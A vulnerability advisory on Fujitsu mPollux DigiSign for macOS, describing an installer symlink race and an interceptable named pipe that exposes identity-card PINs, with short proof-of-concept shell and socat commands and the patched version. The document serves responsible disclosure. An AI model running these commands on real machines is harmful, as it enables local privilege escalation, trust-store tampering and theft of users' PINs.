Fujitsu mPollux for macOS Multiple Vulnerabilities
Description
Finnish Digital and Population Data Services Agency (DVV) provides a Card Reader Software which can be used for strong authentication and digital signing with the DVV issued identity cards. The Fujitsu mPollux DigiSign application communicates with the identity card and allows log in to official e-services and/or digitally sign documents. The Fujitsu mPollux DigiSign Client for macOS version 4.2.4c-8322 and previous contains two security vulnerabilities that in the worst-case scenario can lead to full system compromise. The first vulnerability affects the Fujitsu mPollux software installation procedure which handles files in an insecure manner, allowing a local attacker to replace the files as they are being manipulated. Furthermore, insecure directory and file permissions for the named Unix pipe allow a local attacker to perform a Meddler in the Middle attack between the web browser plugin and the mPollux software, which can result in the exposure of PIN codes to unauthorized local users.
After WithSecure reported these vulnerabilities, Fujitsu has released version 4.2.6-8401 of the mPollux DigiSign Client for macOS that fixes the vulnerabilities. It Is highly recommended to update all installations to this version (or later if available).
Details
1 - CWE-61: UNIX Symbolic Link (Symlink) Following
mPollux creates a world-writable directory /Library/Preferences/mPolluxDigiSign. The software installation process creates a root-owned, world-writable (666) file in this directory using fopen() with umask of 0. Due to this, the fopen() follows softlinks and allows creating any world-writable, root-owned files in the system. In addition, the installation process creates an SSLCA.cer file in this directory, and then installs this certificate to the system certificate trust store. However, due to the file being in a word-writable directory the attacker could trivially replace the file with their own before the file is installed to the root store, enabling a low-privileged local attacker to perform Meddler in the Middle attacks against any TLS connections.
Proof of Concept
- In a shell execute the following:
$ rm -f /Library/Preferences/mPolluxDigiSign/SSLCA.car $ while true; do ln -s /Library/LaunchDaemons/poc.plist \ /Library/Preferences/mPolluxDigiSign/SSLCA.cer; done
- Install mPollux Digisign (as victim)
$ rm /Library/Preferences/mPolluxDigiSign/SSLCA.cer $ echo "whatevercontent" > /Library/LaunchDaemons/poc.plist
This results in the application writing the file contents to the symlink destination. Since the file is created with umask 0 (mode 666), the attacker as a low-privileged user can now overwrite the newly created file contents as they see fit.
2 - CWE-732: Incorrect Permission Assignment for Critical Resource
The application web browser plugin (libcryptoki.dylib) utilizes a named UNIX pipe to communicate with the main mPollux application. Since this file is created in the /Library/Preferences/mPolluxDigiSign directory, any other local unprivileged user can rename this file. Since the file is created with default 666 permissions, any user can read and write to the original pipe file as well.
Proof of Concept
The attack can be implemented with for example socat:
$ s=/Library/Preferences/mPolluxDigiSign/DigiSignGUIServer_503
$ mv $s $s.real
$ socat -x -v -d -d UNIX-LISTEN:$s,reuseaddr,fork \ UNIX-CONNECT:$s.real
When using the browser to authenticate the identity card, the PIN code will be visible in clear text in socat output:
> 2023/04/12 15:50:30.000396022 length=68 from=0 to=67 0f 00 00 00 00 00 00 00 38 00 00 00 01 04 00 00 ........8....... 00 01 00 00 00 02 1e 00 00 00 53 43 4d 20 4d 69 ..........SCM Mi 63 72 6f 73 79 73 74 65 6d 73 20 49 6e 63 2e 20 crosystems Inc. 53 43 52 20 33 33 31 00 02 07 00 00 00 XX XX XX SCR 331......XXX XX XX XX 00 XXX.
Recommendations
After WithSecure reported these vulnerabilities, Fujitsu released mPollux DigiSign Client for macOS version 4.2.6-8401 to address these issues. It Is highly recommended to update all installations to this version (or later if available).